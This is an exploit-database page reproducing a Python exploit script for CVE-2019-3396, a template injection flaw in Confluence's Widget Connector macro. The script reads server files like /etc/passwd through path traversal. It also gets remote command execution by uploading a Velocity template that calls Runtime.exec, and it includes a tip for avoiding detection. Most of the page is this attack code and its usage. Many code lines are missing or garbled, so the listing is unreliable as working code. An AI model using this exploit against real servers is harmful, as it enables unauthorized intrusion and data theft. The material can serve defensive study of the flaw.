Atlassian Confluence Widget Connector Macro SSTI

CVE Category Price Severity
CVE-2019-3396 CWE-94 $0 - $5k Critical
Author Risk Exploitation Type Date
Tommi Mu00e4kitalo (grunt) High Remote 2021-01-22
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L 0.022 0.5115

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Atlassian Confluence Widget Connector Macro SSTI
# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI 
# Date: 21-Jan-2021
# Exploit Author: 46o60
# Vendor Homepage:
# Software Link:
# Version: 6.12.1
# Tested on: Ubuntu 20.04.1 LTS
# CVE : CVE-2019-3396

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-

Exploit for CVE-2019-3396 ( Widget Connector macro in Atlassian
Confluence Server server-side template injection.

Vulnerability information:
        Daniil Dmitriev - Discovering vulnerability
        Dmitry (rrock) Shchannikov - Metasploit module

While Metasploit module works perfectly fine it has a limitation that to gain RCE outbound FTP request is being made
from the target Confluence server towards attacker's server where the Velocity template with the payload is being
hosted. If this is not possible, for example, because network where the target Confluence server is located filters all
outbound traffic, alternative approach is needed. This exploit, in addition to original exploit implements this
alternative approach by first uploading the template to the server and then loading it with original vulnerability from
local file system. The limitation is that to upload a file, a valid session is needed for a non-privileged user. Any
user can upload a file to the server by attaching the file to his "personal space".

There are two modes of the exploit:
  1. Exploiting path traversal for file disclosure and directory listings.
  2. RCE by uploading a template file with payload to the server.

In case where network is filtered and loading remote template is not possible and also you do not have a low-privileged
user session, you can still exploit the '_template' parameter to browse the server file system by using the first mode
of this exploit. Conveniently, application returns file content as well as directory listing depending on to what path
is pointing to. As in original exploit no authentication is needed for this mode.

Limitations of path traversal exploit:
- not possible to distinguish between non-existent path and lack of permissions
- no distinction between files and directories in the output

If you have ability to authenticate to the server and have enough privileges to upload files use the second mode. A
regular user probably has enough privileges for this since each user can have their own personal space where they
should be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not
exists, a file with Velocity template payload. It then uses the original vulnerability but loads the template file
with payload from local filesystem instead from remote system.

Prerequisite of RCE in this exploit:
- authenticated session is needed
- knowledge of where attached files are stored on the file system - if it is not default location then use first mode
to find it, should be in Confluence install directory under ./attachments subdirectory

- list /etc folder on Confluence server hosted on
    python -th fs /etc
- get content of /etc/passwd on same server but through a proxy
    python -th -px fs /etc/passwd
- execute 'whoami' command on the same server (this will upload a template file with payload to the server using
existing session)
    python -th rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB "whoami"

Tested on Confluence versions:

To test the exploit:
    1. Download Confluence trial version for version 6.12.1
        (to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser
        network tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and
        change the version in URL to be 6.12.1)
        SHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6  atlassian-confluence-6.12.1-x64.bin
    2. Run the binary to install it, for example on Ubuntu 20.04. Use "Express Install" and everything by default.
        chmod +x atlassian-confluence-6.12.1-x64.bin
        sudo ./atlassian-confluence-6.12.1-x64.bin
    3. Open the browser to configure initial installation, when you get to license window copy the server ID.
    4. Create account at and request for new trial license using server ID.
    5. Activate the license and finish the installation with default options.
    6. Create a user and login with him to go through initial user setup and get the session id for RCE part of the
    7. Run the exploit (see usage above).

__version__ = "1.0.0"
__author__ = "46o60"

import argparse
import logging
import requests
import urllib3
from bs4 import BeautifulSoup
import re
import json
import random
import string

# script  and banner
SCRIPT_NAME = "CVE-2019-3396: Confluence exploit script"
ASCII_BANNER_TEXT = """____ ____ _  _ ____ _    _  _ ____ _  _ ____ ____ ____ 
|    |  | |\ | |___ |    |  | |___ |\ | |    |  | |__/ 
|___ |__| | \| |    |___ |__| |___ | \| |___ |__| |  \ 

# turn off requests log output

def print_banner():
    Prints script ASCII banner and basic information.

    Because it is cool.
    print("{} v{}".format(SCRIPT_NAME, __version__))
    print("Author: {}".format(__author__))

def exit_log(logger, message):
    Utility function to log exit message and finish the script.

def check_cookie_format(value):
    Checks if value is in format: ^[^=]+=[^=]+$
    pattern = r"^[^=]+=[^=]+$"
    if not re.match(pattern, value):
        raise argparse.ArgumentTypeError("provided cookie string does not have correct format")
    return value

def parse_arguments():
    Performs parsing of script arguments.
    # creating parser
    parser = argparse.ArgumentParser(
        description="Exploit CVE-2019-3396 to explore file system or gain RCE through file upload."

    # general script arguments
        "-V", "--version",
        help="displays the current version of the script",
        version="{name} {version}".format(name=SCRIPT_NAME, version=__version__)
        "-v", "--verbosity",
        help="increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity",
        "-sb", "--skip-banner",
        help="skips printing of the banner",
        "-s", "--silent",
        help="do not output results of the exploit to standard output",
        "-q", "--quiet",
        help="do not output any logs",

    # arguments for input
        "-px", "--proxy",
        help="proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS"
        "-t", "--tls",
        help="use HTTPS protocol, default behaviour is to use plain HTTP",
        "-th", "--target-host",
        help="target hostname/domain",
        "-p", "--port",
        help="port where the target is listening, default ports 80 for HTTP and 443 for HTTPS"

    # two different sub commands
    subparsers = parser.add_subparsers(
        description="different behaviours of the script",
        help="for detail description of available action options invoke -h for each individual action",

    # only exploring file system by disclosure of files and directories
    parser_file_system = subparsers.add_parser(
        help="use the exploit to browse local file system on the target endpoint"
        help="target path that should be retrieved from the vulnerable server, can be path to a file or to a directory"

    # using file upload to deploy payload and achieve RCE
    parser_rce = subparsers.add_parser(
        help="use the exploit to upload a template "
        "-hd", "--home-directory",
        help="Confluence home directory on the server"
        "-c", "--cookie",
        help="cookie that should be used for the session, value passed as it is in HTTP request, for example: "
             "-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB",
        help="target path that should be retrieved from the vulnerable server, can be path to a file or to a directory"

    # parsing
    arguments = parser.parse_args()

    return arguments

class Configuration:
    Represents all supported configuration items.

    # Parse arguments and set all configuration variables
    def __init__(self, script_args):
        self.script_arguments = script_args

        # setting input arguments
        self._proxy = self.script_arguments.proxy
        self._target_protocol = "https" if self.script_arguments.tls else "http"
        self._target_host = self.script_arguments.target_host
        self._target_port = self.script_arguments.port if self.script_arguments.port else \
            443 if self.script_arguments.tls else 80

    def get_logger(verbosity):
        Prepares logger to output to stdout with appropriate verbosity.
        logger = logging.getLogger()
        # default logging level

        # Definition of logging to console
        ch = logging.StreamHandler()
        # specific logging level for console
        if verbosity == 0:
        elif verbosity > 0:

        # formatting
        class MyFormatter(logging.Formatter):

            default_fmt = logging.Formatter('[?] %(message)s')
            info_fmt = logging.Formatter('[+] %(message)s')
            error_fmt = logging.Formatter('[-] %(message)s')
            warning_fmt = logging.Formatter('[!] %(message)s')
            debug_fmt = logging.Formatter('>>> %(message)s')

            def format(self, record):
                if record.levelno == logging.INFO:
                    return self.info_fmt.format(record)
                elif record.levelno == logging.ERROR:
                    return self.error_fmt.format(record)
                elif record.levelno == logging.WARNING:
                    return self.warning_fmt.format(record)
                elif record.levelno == logging.DEBUG:
                    return self.debug_fmt.format(record)
                    return self.default_fmt.format(record)


        # adding handler

        return logger

    # Properties
    def endpoint(self):
        if not self._target_protocol or not self._target_host or not self._target_port:
            exit_log(log, "failed to generate endpoint URL")
        return f"{self._target_protocol}://{self._target_host}:{self._target_port}"

    def remote_path(self):
        return self.script_arguments.path

    def attachment_dir(self):
        home_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \
        return f"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}"

    def rce_command(self):
        return self.script_arguments.command

    def session_cookie(self):
        if not self.script_arguments.cookie:
            return None
        parts = self.script_arguments.cookie.split("=")
        return {
            parts[0]: parts[1]

    def proxies(self):
        return {
            "http": self._proxy,
            "https": self._proxy

class Exploit:
    This class represents actual exploit towards the target Confluence server.
    # used for both path traversal and RCE
    DEFAULT_VULNERABLE_ENDPOINT = "/rest/tinymce/1/macro/preview"

    # used only for RCE
    CREATE_PERSONAL_SPACE_PATH = "/rest/create-dialog/1.0/space-blueprint/create-personal-space"
    PERSONAL_SPACE_KEY_PATH = "/index.action"
    PERSONAL_SPACE_KEY_REGEX = r"^/spaces/viewspace\.action\?key=(.*?)$"
    PERSONAL_SPACE_ID_PATH = "/rest/api/space"
    HOMEPAGE_REGEX = r"/rest/api/content/([0-9]+)$"
    ATL_TOKEN_PATH = "/pages/viewpageattachments.action"
    FILE_UPLOAD_PATH = "/pages/doattachfile.action"
    # file name has no real significance, file is identified on file system by it's ID
    # (change only if you want to avoid detection)
    DEFAULT_UPLOADED_FILE_NAME = "payload_{}.vm".format(
        ''.join(random.choice(string.ascii_lowercase) for i in range(5))
    )  # the extension .vm is not really needed, remove it if you have problems uploading the template
    DEFAULT_CONFLUENCE_INSTALL_DIR = "/var/atlassian/application-data/confluence"
    DEFAULT_CONFLUENCE_ATTACHMENT_PATH = "/attachments/ver003"
    # using random name for uploaded file so it will always be first version of the file

    def __init__(self, config):
        Runs the exploit towards target_url.
        self._config = config

        self._target_url = f"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}"

        if self._config.script_arguments.action == "rce":
            self._root_url = f"{self._config.endpoint}/"
            self._create_personal_space_url = f"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}"
            self._personal_space_key_url = f"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}"

            # Following data will be dynamically created while exploit is running
            self._space_key = None
            self._personal_space_id_url = None
            self._space_id = None
            self._homepage_id = None
            self._atl_token_url = None
            self._atl_token = None
            self._upload_url = None
            self._file_id = None

    def generate_payload_location(self):
        Generates location on file system for uploaded attachment based on Confluence Ver003 scheme.

        See more here:
        if not self._space_id or not self._homepage_id or not self._file_id:
            exit_log(log, "cannot generate payload location without space, homepage and file ID")

        space_folder_one = str(int(self._space_id[-3:]) % 250)
        space_folder_two = str(int(self._space_id[-6:-3]) % 250)
        space_folder_three = self._space_id
        page_folder_one = str(int(self._homepage_id[-3:]) % 250)
        page_folder_two = str(int(self._homepage_id[-6:-3]) % 250)
        page_folder_three = self._homepage_id
        file_folder = self._file_id
        version = Exploit.DEFAULT_FILE_VERSION

        payload_location = f"{self._config.attachment_dir}/" \
                           f"{page_folder_one}/{page_folder_two}/{page_folder_three}/" \
        log.debug(f"generated payload location: {payload_location}")

        return payload_location

    def path_traversal(self, target_remote_path, decode_output=False):
        Uses vulnerability in _template parameter to achieve path traversal.

            target_remote_path (string): path on local file system of the target application
            decode_output (bool): set to True if output of the file will be character codes separated by new lines,
                                    used with RCE
        post_data = {
            "contentId": str(random.randint(1, 10000)),
            "macro": {
                "body": "",
                "name": "widget",
                "params": {
                    "_template": f"file://{target_remote_path}",
                    "url": "" + ''.join(random.choice(
                        string.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11))
        }"sending request towards vulnerable endpoint with payload in '_template' parameter")
        response =
                "Content-Type": "application/json; charset=utf-8"

        # check if response was proper...
        if not response.status_code == 200:
            log.debug(f"response code: {response.status_code}")
            exit_log(log, "exploit failed")

        page_content = response.content
        # response is HTML
        soup = BeautifulSoup(page_content, features="html.parser")

        # if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve
        # the requested path
        error_element = soup.find_all("div", "widget-error")
        if error_element:
            log.warning("failed to retrieve target path on the system")
            log.warning("target path does not exist or application does not have appropriate permissions to view it")
            return ""
            # otherwise parse out the actual response (file content or directory listing)
            output_element = soup.find_all("div", "wiki-content")

            if not output_element:
                exit_log(log, "application did not return appropriate HTML element")
            if not len(output_element) == 1:
                log.warning("application unexpectedly returned multiple HTML elements, using the first one")
            output_element = output_element[0]

            log.debug("extracting HTML element value and stripping the leading and trailing spaces")
            # output = output_element.string.strip()
            output = output_element.decode_contents().strip()

            if "The macro 'widget' is unknown. It may have been removed from the system." in output:
                exit_log(log, "widget seems to be disabled on system, target most likely is not vulnerable")

            if not self._config.script_arguments.silent:
                if decode_output:
                    parsed_output = ""
                    p = re.compile(r"^([0-9]+)")
                    for line in output.split("\n"):
                        r = p.match(line)
                        if r:
                            parsed_output += chr(int(

            return output

    def find_personal_space_key(self):
        Makes request that will return personal space key in the response.
        log.debug("checking if user has personal space")
        response = requests.get(
        page_content = response.text
        if "Add personal space" in page_content:
  "user does not have personal space, creating it now...")

            response =
                    "Content-Type": "application/json"
                    "spaceUserKey": ""

            if not response.status_code == 200:
                log.debug(f"response code: {response.status_code}")
                exit_log(log, "failed to create personal space")

            log.debug(f"personal space created")
            response_data = response.json()
            self._space_key = response_data.get("key")
  "sending request to find personal space key")
            response = requests.get(

            # check if response was proper...
            if not response.status_code == 200:
                log.debug(f"response code: {response.status_code}")
                exit_log(log, "failed to get personal space key")

            page_content = response.content
            # response is HTML
            soup = BeautifulSoup(page_content, features="html.parser")

            personal_space_link_element = soup.find("a", id="view-personal-space-link")
            if not personal_space_link_element or not personal_space_link_element.has_attr("href"):
                exit_log(log, "failed to find personal space link in the response, does the user have personal space?")
            path = personal_space_link_element["href"]
            p = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX)
            r = p.match(path)
            if r:
                self._space_key =
                exit_log(log, "failed to find personal space key")

        log.debug(f"personal space key: {self._space_key}")
        self._personal_space_id_url = f"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?" \
        log.debug(f"generated personal space id url: {self._personal_space_id_url}")

    def find_personal_space_id_and_homepage_id(self):
        Makes request that will return personal space ID and homepage ID in the response.
        if self._personal_space_id_url is None:
            exit_log(log, f"personal space id url is missing, did you call exploit functions in correct order?")"sending request to find personal space ID and homepage")
        response = requests.get(

        # check if response was proper...
        if not response.status_code == 200:
            log.debug(f"response code: {response.status_code}")
            exit_log(log, "failed to get personal space key")

        page_content = response.content
        # response is JSON
        data = json.loads(page_content)

        if "results" not in data:
            exit_log(log, "failed to find 'result' section in json output")
        items = data["results"]
        if type(items) is not list or len(items) == 0:
            exit_log(log, "no results for personal space id")
        personal_space_data = items[0]
        if "id" not in personal_space_data:
            exit_log(log, "failed to find ID in personal space data")
        self._space_id = str(personal_space_data["id"])
        log.debug(f"found space id: {self._space_id}")
        if "_expandable" not in personal_space_data:
            exit_log(log, "failed to find '_expandable' section in personal space data")
        personal_space_expandable_data = personal_space_data["_expandable"]
        if "homepage" not in personal_space_expandable_data:
            exit_log(log, "failed to find homepage in personal space expandable data")
        homepage_path = personal_space_expandable_data["homepage"]
        p = re.compile(Exploit.HOMEPAGE_REGEX)
        r = p.match(homepage_path)
        if r:
            self._homepage_id =
            log.debug(f"found homepage id: {self._homepage_id}")
            self._atl_token_url = f"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}"
            log.debug(f"generated atl token url: {self._atl_token_url}")
            self._upload_url = f"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}"
            log.debug(f"generated upload url: {self._upload_url}")
            exit_log(log, "failed to find homepage id, homepage path has incorrect format")

    def get_csrf_token(self):
        Makes request to get the current CSRF token for the session.
        if self._atl_token_url is None:
            exit_log(log, f"atl token url is missing, did you call exploit functions in correct order?")"sending request to find CSRF token")
        response = requests.get(

        # check if response was proper...
        if not response.status_code == 200:
            log.debug(f"response code: {response.status_code}")
            exit_log(log, "failed to get personal space key")

        page_content = response.content
        # response is HTML
        soup = BeautifulSoup(page_content, features="html.parser")

        atl_token_element = soup.find("input", {"name": "atl_token"})
        if not atl_token_element.has_attr("value"):
            exit_log(log, "failed to find value for atl_token")
        self._atl_token = atl_token_element["value"]
        log.debug(f"found CSRF token: {self._atl_token}")

    def upload_template(self):
        Makes multipart request to upload the template file to the server.
        """"uploading template to server")
        if not self._atl_token:
            exit_log(log, "cannot upload a file without CSRF token")
        if self._upload_url is None:
            exit_log(log, f"upload url is missing, did you call exploit functions in correct order?")

        # Velocity template here executes command and then captures the output. Here the output is generated by printing
        # character codes one by one in each line. This can be improved for sure but did not have time to investigate
        # why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern
        # webapp' was not working properly. This gets decoded on our python client later.
        template = f"""#set( $test = "test" )
#set($ex = $test.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("{self._config.script_arguments.command}"))
#set($exout = $ex.waitFor())
#set($out = $ex.getInputStream())
#foreach($i in [1..$out.available()])
#set($ch = $

        log.debug(f"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}")
        parts = {
            "atl_token": (None, self._atl_token),
            "file_0": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template),
            "confirm": "Attach"
        response =

        # for successful upload first a 302 response needs to happen then 200 page is returned with file ID
        if response.status_code == 403:
            exit_log(log, "got 403, probably problem with CSRF token")
        if not len(response.history) == 1 or not response.history[0].status_code == 302:
            exit_log(log, "failed to upload the payload")

        page_content = response.content

        if "Upload Failed" in str(page_content):
            exit_log(log, "failed to upload template")

        # response is HTML
        soup = BeautifulSoup(page_content, features="html.parser")

        file_link_element = soup.find("a", "filename", {"title": Exploit.DEFAULT_UPLOADED_FILE_NAME})
        if not file_link_element.has_attr("data-linked-resource-id"):
            exit_log(log, "failed to find data-linked-resource-id attribute (file ID) for uploaded file link")
        self._file_id = file_link_element["data-linked-resource-id"]
        log.debug(f"found file ID: {self._file_id}")

def exploit_path_traversal(config):
    This sends one request towards vulnerable server to either get local file content or directory listing.
    log.debug("running path traversal exploit")

    exploit = Exploit(config)

def exploit_rce(config):
    """This executes multiple steps to gain RCE. Requires a session token.

        1. find personal space key for the user
        2. find personal space ID and homepage ID for the user
        3. get CSRF token (generated per session)
        4. upload template file with Java code (involves two requests, first one is 302 redirection)
        5. use path traversal part of exploit to load and execute local template file
        6. profit
    log.debug("running RCE exploit")

    exploit = Exploit(config)
    payload_location = exploit.generate_payload_location()
    exploit.path_traversal(payload_location, decode_output=True)

if __name__ == "__main__":
    # parse arguments and load all configuration items
    script_arguments = parse_arguments()
    log = Configuration.get_logger(script_arguments.verbosity)

    configuration = Configuration(script_arguments)

    # printing banner
    if not configuration.script_arguments.skip_banner:

    if script_arguments.quiet:
        log.disabled = True

    log.debug("finished parsing CLI arguments")
    log.debug("configuration was loaded successfully")
    log.debug("starting exploit")

    # disabling warning about trusting self sign certificate from python requests

    # run appropriate function depending on mode


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.